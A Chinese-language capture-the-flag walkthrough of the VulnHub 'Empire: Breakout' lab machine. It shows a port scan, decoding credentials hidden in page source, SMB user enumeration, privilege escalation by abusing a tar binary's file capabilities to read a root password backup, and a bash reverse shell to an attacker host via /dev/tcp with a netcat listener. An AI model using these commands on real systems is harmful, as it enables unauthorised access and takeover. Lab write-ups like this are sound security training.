vulnhub靶場之EMPIRE
準備:
攻擊機:虛擬機kali、本機win10。
靶機:EMPIRE: BREAKOUT,地址我這裡設置的橋接,下載地址://download.vulnhub.com/empire/02-Breakout.zip,下載後直接VirtualBox打開,如果使用vm打開可能會存在ip問題。
涉及的知識點:shell反彈、許可權提升、smb、samba掃描、解密、getcap命令的使用(查看可執行文件獲取的內核許可權)。
資訊收集:
使用nmap掃描靶機開放的埠和對應的具體服務資訊,命令:nmap -T4 -sV -p- -A 192.168.1.4。
對80埠進行文件掃描,但是未發現什麼有用的資訊。
分別訪問下80、10000、20000埠,發現80是一個默認的頁面,10000和20000頁面是兩個登錄頁面。
嘗試對登錄窗口進行注入、爆破均失敗,但是在80埠的源程式碼資訊中發現了一串加密的字元串。
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
開始滲透:
在//esoteric.sange.fi/brainfuck/impl/interp/i.html網站對字元串進行解密,獲得字元串:.2uqPEfj3D<P’a-3
觀察到139、445埠開啟的samba軟體(基於smb協議),因此我們可以使用enum4linux(smb、samba專用掃描器)來進行掃描以下,命令:enum4linux 192.168.1.4,獲得用戶名:cyber。
使用獲得賬戶名和密碼嘗試進行登錄:cyber/.2uqPEfj3D<P’a-3,發現在20000埠可以登錄成功並具有shell許可權。
在cyber賬戶許可權下找到第一個flag。
提權:
在/cyber目錄下我們還發現了tar文件,查看文件許可權發現其具有可執行許可權,命令:ls -l。
那我們就查看下該文件執行時所具有的內核許可權,命令:getcap tar,發現其可以繞過文件的讀許可權檢查以及目錄的讀/執行許可權的檢查(cap_dac_read_search表示的就是這個意思)。
對網站目錄目錄進行查看,最後在/var目錄下發現backup文件,其他目錄下未發現有用資訊。
在/backups文件夾下發現密碼的備份文件:.old_pass.bak
然後對.old_pass.bak文件進行壓縮和解壓就可以讀取root密碼,壓縮密碼:./tar -cvf upfine.tar /var/backups/.old_pass.bak,解壓密碼:./tar -xvf upfine.tar,然後進入/var/backups目錄下讀取.old_pass.bak文件,發現root密碼:Ts&4&YurgtRX(=~h。
到這裡的話有兩種方式,第一種:在10000埠採用:admin/Ts&4&YurgtRX(=~h,進行登錄,進入後可直接獲得root賬戶許可權。
第二種:反彈一個shell,在kali中開啟對8899埠的監聽,命令:nc -lvvp 8899,然後在靶機中執行bash命令:bash -c ‘bash -i >& /dev/tcp/192.168.1.12/8899 0>&1’。
在反彈的shell中切換root用戶並查看root下的文件資訊,成功獲得第二個flag。
